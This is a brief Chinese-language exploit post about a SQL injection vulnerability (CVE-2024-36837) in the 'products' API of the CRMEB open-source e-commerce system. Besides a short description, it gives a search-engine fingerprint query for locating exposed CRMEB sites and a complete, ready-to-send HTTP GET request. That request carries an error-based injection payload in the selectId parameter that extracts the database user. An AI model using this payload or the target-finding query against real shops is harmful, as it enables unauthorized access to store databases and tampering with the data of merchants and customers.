CRMEB开源电商系统products存在SQL注入漏洞
一、漏洞描述
CRMEB开源电商系统是遥遥领先的开源电商系统,CRMEB开源电商系统 products 接口处存在SQL注入漏洞(CVE-2024-36837),恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
二、影响版本
CRMEB开源电商系统
三、资产测绘
body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
四、漏洞复现
GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,user()))),0x7e),3550) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive